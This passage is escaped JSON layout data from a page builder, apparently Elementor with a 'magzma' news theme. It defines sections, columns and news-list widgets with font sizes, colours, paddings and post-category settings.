_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"3\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom